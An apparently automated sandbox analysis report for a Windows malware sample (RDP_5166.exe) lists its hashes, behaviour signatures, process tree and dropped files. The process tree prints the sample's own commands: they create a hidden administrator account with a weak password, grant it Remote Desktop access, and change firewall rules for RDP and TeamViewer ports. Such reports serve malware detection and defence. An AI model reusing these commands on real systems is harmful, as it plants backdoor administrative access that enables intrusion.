Analysis

  • max time kernel
    135s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-08-2024 06:25

General

  • Target

    $TEMP/RDP_5166.exe

  • Size

    569KB

  • MD5

    a46ab91afbba2a657bce8e961bf2632f

  • SHA1

    7c1a484a381fc4915c6904358f7a3611ad9323d2

  • SHA256

    740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1

  • SHA512

    a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4

  • SSDEEP

    12288:8W7IR23s4x7/6GDG9e9WJX08vV0CjUsZl4VXqnxq:h7J5D6GDGc9WJk8d0wLIaq

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe
    "C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"
    1⤵
    • Allows Network login with blank passwords
    • Checks computer location settings
    • Loads dropped DLL
    • Modifies WinLogon
    • Hide Artifacts: Hidden Users
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4556
    • C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe
      "C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i
      2⤵
      • Server Software Component: Terminal Services DLL
      • Executes dropped EXE
      • Modifies WinLogon
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:3312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:4356
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\SysWOW64\net.exe
        net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2788
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add
      2⤵
      • Remote Service Session Hijacking: RDP Hijacking
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\SysWOW64\net.exe
        net localgroup "Administrators" "wgautilacc" /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2556
      • C:\Windows\SysWOW64\net.exe
        net localgroup "Remote Desktop Users" "wgautilacc" /add
        3⤵
        • Remote Service Session Hijacking: RDP Hijacking
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add
          4⤵
          • Remote Service Session Hijacking: RDP Hijacking
          • System Location Discovery: System Language Discovery
          PID:5020
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    1⤵
      PID:1516
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
      1⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1036
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1292,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8
      1⤵
        PID:4312

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe

        Filesize

        1.5MB

        MD5

        9adce164113ec09d243a78029aecfa2e

        SHA1

        403fb3148345800ca6f0374459e3f6d5ef3b613e

        SHA256

        d577804cf39a7af100747f2dcc00c525a19fa3cb0498885d020cc2a0f10a9436

        SHA512

        c938ccc8b89181e2d5113f31e4adc532b0c62793ba3549dbc7ece22a30219d4f0885e89b1ac01499bed5ea1dd653cbee3b61bdb0883d9980ea4c518ac70b01f5

      • C:\Users\Admin\AppData\Local\Temp\nsh4B1E.tmp\System.dll

        Filesize

        11KB

        MD5

        0063d48afe5a0cdc02833145667b6641

        SHA1

        e7eb614805d183ecb1127c62decb1a6be1b4f7a8

        SHA256

        ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

        SHA512

        71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

      • C:\Users\Admin\AppData\Local\Temp\nsh4B1E.tmp\nsExec.dll

        Filesize

        6KB

        MD5

        293165db1e46070410b4209519e67494

        SHA1

        777b96a4f74b6c34d43a4e7c7e656757d1c97f01

        SHA256

        49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

        SHA512

        97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

      • \??\c:\program files\icosahedron\disavow.dll

        Filesize

        102KB

        MD5

        de5ab87a7fcc1d9225feed2185fa0d08

        SHA1

        9184073717812324999601bf3dbfa89c52f2ce4d

        SHA256

        54fa75eadbadd1c86ca950ae93b70e5512dea629d103fdf5eaa1b070a32068ac

        SHA512

        226819782e68b051003f7f47b4e1d5a6b6d52713ee4bff6f740fbc356793d8e526663c7c51f230b44ac04449e4ca79c28a8454f20badf3f322d8f7a40c87851f

      • \??\c:\program files\icosahedron\disavow.ini

        Filesize

        181KB

        MD5

        1d63f27fe33bcf7795ffbee0576d76aa

        SHA1

        6f3c71f8ecd983d54502798c190e02ebf5e6a1e4

        SHA256

        57d03a2a794019bea83f1e866c83ea48db91feb2599036435db291e098f7ff7a

        SHA512

        871906a16812dc05ba75208e2ef84838f003bc082c9d27e12783e97a18a8cd96daecb5cae92f4429df74414cd203e522ec6749ce4c9d8a130e9fa35c782e3a78

      • memory/2824-40-0x0000000000400000-0x000000000058F000-memory.dmp

        Filesize

        1.6MB